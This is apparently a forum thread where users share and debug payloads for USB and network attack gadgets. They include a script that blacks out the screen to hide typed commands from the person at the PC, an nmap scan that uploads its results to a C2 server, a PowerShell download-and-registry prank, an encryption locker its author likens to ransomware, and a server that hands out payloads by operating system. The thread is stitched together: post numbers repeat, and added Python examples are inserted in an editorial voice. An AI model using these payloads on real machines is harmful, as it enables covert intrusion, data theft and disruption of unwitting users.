  12. One of the problems I had with the ducky is that when typing a script on a target's PC it's really hard if there is a person in front of it. Instead of trying to make the command screen as small as possible so the targets won't see the screen, I've made it so big that they will think the monitor crashed or the cable fell out. The only thing you see now is a black screen and black text, so the targets won't see any strings the ducky types. It also doesn't matter if the user clicks somewhere on the screen with the mouse, because the whole screen is the command line. Here is the payload: REM Make Black Screen DELAY 1000 GUI r DELAY 100 STRING cmd CTRL-SHIFT ENTER DELAY 100 ALT y DELAY 100 STRING mode con: cols=30 lines=1 ALT SPACE UP ENTER DELAY 100 TAB SPACE SHIFT TAB SHIFT TAB STRING 5 SHIFT TAB RIGHT TAB UP TAB TAB TAB SHIFT TAB STRING 0 TAB STRING 0 TAB STRING 0 TAB TAB TAB TAB TAB DOWN DOWN DOWN TAB TAB TAB SHIFT TAB STRING 0 TAB STRING 0 TAB STRING 0 TAB TAB ENTER ALT ENTER REM Black Screen made! REM ***Disable keyboard & mice *** REM ***PAYLOAD**** One problem I had was to disable the target's keyboard (and mouse) so the target can't screw up the script/program the ducky is writing. It is a possibility that the target will freak out and push a lot of keys when they see a black screen. If anyone knows a solution to this problem, please notify me.
  13. Hey y'all, just wanted to share my slightly modified nmap scan payload. It scans a bunch of ports, saves the output with a date stamp and multiple output types, and then uploads the loot to the C2 server.

    #!/bin/bash
    #
    # Title: Custom Nmap Payload for Shark Jack
    # Author: Flatlinebb
    # Version: 1.02
    #
    # Scans target subnet with Nmap using specified options. Saves each scan result
    # to loot storage folder. Uploads loot to your C2 server
    #
    # Red ...........Setup
    # Amber..........Scanning
    # Green..........Finished
    #
    # See nmap --help for options. Default "-sP" ping scans the address space for
    # fast host discovery.

    NMAP_OPTIONS="-p 21,22,23,53,69,80,123,139,443,445,554,1812,3389,5220,2022,4242,4343,5000,5650,5655,5670,5800,5900,8080,8333,8222,8765,8008,8009,8181,8282,8383,8484,8888,8443,9000,10000,32400,32401,32402,49153 --open"
    LOOT_DIR=/root/loot/nmap
    SCAN_DIR=/etc/shark/nmap

    function finish() {
      LED CLEANUP
      # Kill Nmap
      echo $1
      wait $1
      kill $1 &> /dev/null
      # Exfiltrate all loot files
      FILES="$LOOT_DIR/*.*"
      for f in $FILES; do
        C2EXFIL STRING $f $SUBNET;
      done
      # Sync filesystem
      echo $SCAN_M > $SCAN_FILE
      sync
      sleep 1
      LED FINISH
      sleep 1
      # Halt system
      halt
    }

    function setup() {
      LED SETUP
      # Create loot directory
      mkdir -p $LOOT_DIR &> /dev/null
      # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+
      NETMODE DHCP_CLIENT
      # Wait for an IP address to be obtained
      while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
      # Create tmp scan directory
      mkdir -p $SCAN_DIR &> /dev/null
      # Create tmp scan file if it doesn't exist
      SCAN_FILE=$SCAN_DIR/scan-count
      if [ ! -f $SCAN_FILE ]; then
        touch $SCAN_FILE && echo 0 > $SCAN_FILE
      fi
      # Find IP address and subnet
      while [ -z "$SUBNET" ]; do
        sleep 1 && find_subnet
      done
    }

    function find_subnet() {
      SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
    }

    function run() {
      # Run setup
      setup
      # Scan counter persisted in /etc/shark/nmap/scan-count
      SCAN_N=$(cat $SCAN_FILE)
      SCAN_M=$(( $SCAN_N + 1 ))
      LED ATTACK
      # Connect to Cloud C2
      C2CONNECT
      # Wait until Cloud C2 connection is established
      while ! pgrep cc-client; do sleep 1; done
      # Start scan. ${SCAN_M} is braced so the trailing underscore is not read as part of the variable name.
      nmap $NMAP_OPTIONS $SUBNET -oA $LOOT_DIR/nmap-scan_${SCAN_M}_`date +"%Y-%m-%d_%H%M%S"` &>/dev/null &
      tpid=$!
      sleep 1
      finish $tpid
    }

    # Run payload
    run &

    Obligatory github link: https://github.com/flatlinebb/sharkjack-payloads/blob/master/payloads/library/recon/Custom nmap payload/payload.sh
  14. Link to GitHub: https://github.com/hak5/bashbunny-payloads/pull/67 Comment if you would like to see some improvements or changes.
  15. HoldEmUp Private Encryption Locker
    By REDD (aka Ar1k88)
    Fork from: https://github.com/private-locker/Private-Encrypted-Locker
    GitHub URL: https://github.com/private-locker/bashbunny-payloads/tree/master/payloads/library/general/HoldEmUp (Waiting on Official Hak5 Merge)

    This script was previously released on here, then taken down. I had decided to release it on here again since we have also released the source on our community GitHub.

    Features:
    Use 256-bit AES encryption to encrypt and secure files with a uniquely generated AES key.
    Edit "settings.db" to change the file format of encrypted files.
    No need for 3rd-party applications to hide documents.

    "How this was made? I saw how WannaCry and other ransomware would "Hold You Hostage". So I decided to sit down, make a PoC (Proof of Concept) that quickly turned into a security tool that could be used to lock and unlock your own files. So I held onto the files, even released them for Hak5 as a demo on the Bash Bunny, but quickly realized it had "ransomware" qualities. I quickly removed it. But as times come to pass, security is getting better. There are other programmers besides myself that could benefit from this project. Prevent the next wave of "ransomware". -REDD"

    DO NOT LOSE YOUR LOCKER KEYS! NO KEY = NO DECRYPTING. YOU HAVE BEEN WARNED!
  16. Shanegal (shane)

    Hey guys, so I had some trouble with the screaming payload of doom payload, so I've adapted the wallpaper changer payload to do basically the same thing, but instead of transferring the wallpaper jpeg it transfers the .wav file from the Bash Bunny. Everything kinda works apart from the transferred wav file keeps showing up as 0kb after the script has run? Can anyone help me with this please? Here is the script I've made, and I've attached the full payload at the bottom.

    LED SETUP
    ATTACKMODE HID RNDIS_ETHERNET
    GET HOST_IP
    GET SWITCH_POSITION
    udisk mount
    cd /root/udisk/payloads/$SWITCH_POSITION
    # Serve the switch folder (where S.WAV lives) to the target over RNDIS
    python -m SimpleHTTPServer 80 &
    LED ATTACK
    Q GUI r
    Q DELAY 500
    # -OutFile makes PowerShell write the response body to disk. With a cmd-level
    # ">" redirect, cmd.exe redirects the output of "start" (which prints nothing),
    # so the file is created empty and the download never lands in it.
    Q STRING "cmd /C \"start /MIN powershell iwr http://$HOST_IP/S.WAV -OutFile %USERPROFILE%\s.wav && reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current /t REG_SZ /d %USERPROFILE%\s.wav /f\""
    Q ENTER
    LED G SUCCESS

    Attachments: s.wav, screamer payload.txt
  17. In the spirit of April Fools, I ported the original UnifiedRickRoll to Windows, so you can easily switch between Apple and Windows computers and still get the same effect. https://github.com/hak5/bashbunny-payloads/pull/139
  18. Hello, having received my new toy recently (Bash Bunny), I tried to use some scripts like "wallpaper-changer-of-doom", except it didn't work at home. Here is the script: https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank If some of you have any suggestions, I'm interested :) Affectionately, jcardonne
  19. Dear everyone, I am doing some experimenting with my new Bash Bunny and was wondering, once I enable an ATTACKMODE interface, if it is possible to disable it after a little while without turning off the payload. For example, I am trying ATTACKMODE HID STORAGE and then wondering if I can do something like DISABLE STORAGE or something like that. I know to some of you this is probably going to seem like a stupid question, but if anyone knows the answer, can you please share. Thank you!!!
  20. Hello!! This is my payload, just a Python SMB server that points to the switch folder. PROBLEM: it creates the share, but I can't access the files, because /root/udisk is not mounted. If I boot the Bunny in RNDIS, go to the console and do "udisk mount", I can access the files, but I can't mount udisk from inside a payload. Any ideas? Is there anything I'm missing? Thx, and keep on developing!! :)

    #!/bin/bash
    LED SETUP
    GET SWITCH_POSITION
    SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
    LOOTDIR=$SWITCHDIR/loot
    LED STAGE1
    ATTACKMODE RNDIS_ETHERNET
    udisk mount
    # Share the switch folder as "e" over SMB (impacket's smbserver.py)
    python /tools/impacket/examples/smbserver.py e $SWITCHDIR &
    LED FINISH
  22. sub0

    [PAYLOAD] AutoPwn

    Hello, I had an idea for a sort of cross-platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple Python web server using Flask to detect the user agent and serve the payload according to the target's user agent. This is only a PoC, nothing finalized at all, but I think an interesting idea to play with. This could probably be deployed with the Bash Bunny as well. The idea is to run this DuckyScript:

    DELAY 1000
    ALT F2
    DELAY 50
    GUI SPACE
    GUI r
    DELAY 50
    BACKSPACE
    DELAY 100
    STRING http://10.10.0.53:8080/
    ENTER

    This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with Windows at all, been years since I used it (I'm a total Linux nerd), so my PowerShell payload is probably terrible. I would welcome any and all improvements, ideas, etc. Thanks for reading! - sub0

    Attachment: autopwn.py
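The attached autopwn.py is not reproduced on this page, so here is an added example of the mechanism the post describes, written from scratch and not sub0's code: a small stdlib HTTP server that classifies the browser's User-Agent into an OS family and hands back a per-OS file. The per-OS bodies are placeholders, and the ordering of the match rules is the part worth copying: Android user agents also contain "Linux", and iPhone/iPad agents also contain "Mac OS X", so the more specific strings have to be checked first. Port 8080 matches the DuckyScript above; the filenames are assumptions.

```python
"""Serve a different file depending on the requesting browser's OS, inferred
from the User-Agent header.

Added example, not the post's autopwn.py and not Hak5 code. The per-OS bodies
below are placeholder text; the file names are assumed.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer

# Checked in order: the more specific families first, because an Android UA
# also contains "Linux" and an iPhone/iPad UA also contains "Mac OS X".
_UA_RULES = (
    ("android", "Android"),
    ("iphone", "iOS"),
    ("ipad", "iOS"),
    ("windows", "Windows"),
    ("macintosh", "macOS"),
    ("mac os x", "macOS"),
    ("linux", "Linux"),
)


def detect_os(user_agent):
    """Map a User-Agent string to an OS family name, or 'Unknown'."""
    ua = (user_agent or "").lower()
    for needle, name in _UA_RULES:
        if needle in ua:
            return name
    return "Unknown"


# Hypothetical per-OS files: (filename, content type, body). Placeholders only.
PAYLOADS = {
    "Windows": ("payload.ps1", "text/plain",
                "Write-Host 'windows stager placeholder'\n"),
    "macOS": ("payload.sh", "text/x-shellscript",
              "#!/bin/sh\necho 'macos stager placeholder'\n"),
    "Linux": ("payload.sh", "text/x-shellscript",
              "#!/bin/sh\necho 'linux stager placeholder'\n"),
}


def payload_for(user_agent):
    """(filename, content_type, body) for the detected OS, or None if there is
    nothing to serve (mobile browsers, curl, unknown agents)."""
    return PAYLOADS.get(detect_os(user_agent))


class AutoPwnHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        chosen = payload_for(self.headers.get("User-Agent"))
        if chosen is None:
            self.send_response(404)
            self.end_headers()
            return
        filename, ctype, body = chosen
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        # Content-Disposition makes the browser save the file instead of rendering it
        self.send_header("Content-Disposition", f'attachment; filename="{filename}"')
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, fmt, *args):
        ua = self.headers.get("User-Agent")
        print(f"{self.client_address[0]} {detect_os(ua)} <- {ua}")


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), AutoPwnHandler).serve_forever()
```

Run it on the host the DuckyScript points at and watch the log line per request; a 404 for an unrecognised agent is deliberate, so that a scanner or curl probe gets nothing useful back.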
  22. Hi dear friends. I watched this video. But I don't know which payload he used in this video. So, what do you think about it? Which payload must it be?
  23. Hello! I have a question. How do I download a shell from PowerShell (from Win+R)? Can someone write me a command for the Bunny?
  24. In the spirit of April Fools, I've thrown together a payload that will rickroll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rickroll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  25. I am quite new to the Bash Bunny and programming in general - I am literally a n00b, so any feedback or advice would be helpful. I am trying to create a payload that can potentially increase the number of switches, which may be useful in particular environments such as when you don't have direct access to your own computer, specifically without using STORAGE. The way it works is the following: in the UDISK directory \payloads\, by default there are only two switches; with Nswitch, you can potentially have any number of switches (restricted by the storage of course); so in addition to the above directories, you can also create:

    Now switch1 is the Nswitch controller - the Nswitch can be changed in two ways, depending on whether you have a lockscreen or not. It is also able to detect the state of the lockscreen (which may be useful in other applications where you can set up two different attacks depending on the state). If there is no lockscreen, then the Bash Bunny will run an HTTP server, and you can set the switch number from http://172.16.64.1 directly. If there is a lockscreen, then the Bash Bunny will simply increase the value of N incrementally by 1, i.e. each time you plug in the device N:=N+1. This also works if you don't have direct access to a computer: you can simply change the switch by repeatedly plugging it into a USB power bank (although this may take some time to reach switch6, as you would have to wait for the Bunny to boot up and the LEDs to flash and repeat this 6 times, which isn't ideal in every situation).

    #!/bin/bash
    LED SETUP
    ATTACKMODE HID RNDIS_ETHERNET
    GET TARGET_IP
    GET HOST_IP
    GET SWITCH_POSITION
    cd /root/udisk/payloads/$SWITCH_POSITION
    if [ -z "${TARGET_IP}" ]; then
        LED FAIL2
        exit 1
    fi
    if [ ! -f Nswitch.txt ]; then
        echo 0 > Nswitch.txt
    fi
    LED STAGE1
    # Detecting lockscreen: capture ICMP echo requests on the USB link while a
    # ping is typed on the host. On a locked session nothing gets typed, so no
    # echo request arrives.
    tcpdump -l -i usb0 'icmp and icmp[icmptype]=icmp-echo' -vv > ping &
    TCPDUMP_PID=$!
    # Windows OS specific, can change to RUN OSX or RUN UNITY
    RUN WIN ping $HOST_IP -n 1
    sleep 1
    if grep "ICMP" ping > /dev/null; then
        echo 1 > lockscreen   # Unlocked
        LED G DOUBLE
        # Try Captive portal to overcome some restrictions?
        # (SimpleHTTPServer hands post.php back as a static file; the PHP
        # handler below needs a PHP-capable server.)
        python -m SimpleHTTPServer 80 &
        while ! nc -z localhost 80; do sleep 0.2; done
    else
        echo 0 > lockscreen   # Locked
        LED R DOUBLE
        N=$(( $(cat Nswitch.txt) + 1 ))
        echo $N > Nswitch.txt
    fi
    kill $TCPDUMP_PID 2>/dev/null
    # Read the selected switch back so N is set on both branches, then copy the
    # directory's contents (cp without -r fails on a directory) over switch1.
    N=$(cat Nswitch.txt)
    cp -r /root/udisk/payloads/switch$N/. /root/udisk/payloads/switch1/

    with

    <form name="web_form" id="web_form" method="post" action="post.php">
        <p><label>Nswitch:</label><input type="number" name="N" id="N" /></p>
        <input type="submit" value="Amend">
    </form>

    and

    <?php
    // Only a whole number is ever used in the switch$N path
    $N = (int) $_POST['N'];
    // "w" overwrites: the file holds the current switch number, not a history
    $fp = fopen("Nswitch.txt", "w");
    fwrite($fp, $N);
    fclose($fp);
    ?>

    It still isn't complete yet, but I have been able to detect the lockscreen state successfully. I did have some issues with the web server at first, but this has been mostly resolved; I just need to finish off the code. Before I do, I thought I would get some advice from the Hak5 community on whether this payload would even be useful to other people, and how I could optimize the code or make it better.
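The lockscreen check in the post hinges on one thing: an ICMP echo request from the target, sent to the Bunny's address, showing up in the tcpdump capture after the `ping` was typed. The grep for "ICMP" accepts any ICMP line, so a stray reply or a packet from another source would also read as "unlocked". Here is an added example, not the post's code, of the same inference done strictly (source and destination checked) over constructed tcpdump lines, plus the switch-counter step generalised with a wrap-around so the counter cannot run past the highest switchN directory that exists. The addresses are the Bash Bunny defaults mentioned in the post (172.16.64.1 for the Bunny) and an assumed 172.16.64.10 for the host; the capture text is hand-written, not a real capture.

```python
"""Lock-screen inference from tcpdump output and N-switch selection.

Added example, not the post's payload. SAMPLE_* strings are hand-written in
the shape of `tcpdump -vv` output; the host address 172.16.64.10 is assumed.
"""
import re

HOST_IP = "172.16.64.1"     # the Bunny's own address on usb0 (from the post)
TARGET_IP = "172.16.64.10"  # assumed address the target gets over RNDIS

# Constructed: what the capture looks like when the typed ping actually ran.
SAMPLE_CAPTURE_UNLOCKED = """\
tcpdump: listening on usb0, link-type EN10MB (Ethernet), capture size 262144 bytes
12:00:01.123456 IP (tos 0x0, ttl 128, id 4711, offset 0, flags [none], proto ICMP (1), length 60)
    172.16.64.10 > 172.16.64.1: ICMP echo request, id 1, seq 1, length 40
"""
# Constructed: locked session, nothing was typed, only tcpdump's banner.
SAMPLE_CAPTURE_LOCKED = """\
tcpdump: listening on usb0, link-type EN10MB (Ethernet), capture size 262144 bytes
"""
# Constructed: ICMP present, but it is a reply going the other way; must not count.
SAMPLE_CAPTURE_REPLY_ONLY = """\
tcpdump: listening on usb0, link-type EN10MB (Ethernet), capture size 262144 bytes
12:00:02.000000 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto ICMP (1), length 60)
    172.16.64.1 > 172.16.64.10: ICMP echo reply, id 1, seq 1, length 40
"""

ECHO_REQ_RE = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+) > (\d+\.\d+\.\d+\.\d+): ICMP echo request")


def host_is_unlocked(capture_text, target_ip=TARGET_IP, host_ip=HOST_IP):
    """True iff an ICMP echo request from target_ip to host_ip is in the capture.
    The ping is typed over HID, which only works on an unlocked session."""
    for line in capture_text.splitlines():
        m = ECHO_REQ_RE.match(line)
        if m and m.group(1) == target_ip and m.group(2) == host_ip:
            return True
    return False


SWITCH_RE = re.compile(r"^switch(\d+)$")


def list_switches(dir_names):
    """Switch numbers present among directory names, e.g. from os.listdir()."""
    return sorted(int(m.group(1)) for m in map(SWITCH_RE.match, dir_names) if m)


def next_switch(current, available):
    """Next switch number after `current`, wrapping to the lowest available one.
    The post's payload just does N+1; wrapping is the generalisation here."""
    if not available:
        raise ValueError("no switchN directories found")
    later = [n for n in sorted(available) if n > current]
    return later[0] if later else min(available)


if __name__ == "__main__":
    for label, cap in (("unlocked", SAMPLE_CAPTURE_UNLOCKED),
                       ("locked", SAMPLE_CAPTURE_LOCKED),
                       ("reply only", SAMPLE_CAPTURE_REPLY_ONLY)):
        print(f"{label:11} -> unlocked={host_is_unlocked(cap)}")
    dirs = ["switch1", "switch2", "loot", "switch3", "switch6"]
    print("switch order:", [next_switch(n, list_switches(dirs)) for n in (0, 1, 3, 6)])
```

In the payload this replaces `grep "ICMP" ping` with a check on the source and destination, and `N=$((N+1))` with a lookup against the directories that actually exist, so an over-count never points `cp` at a switch folder that is not there.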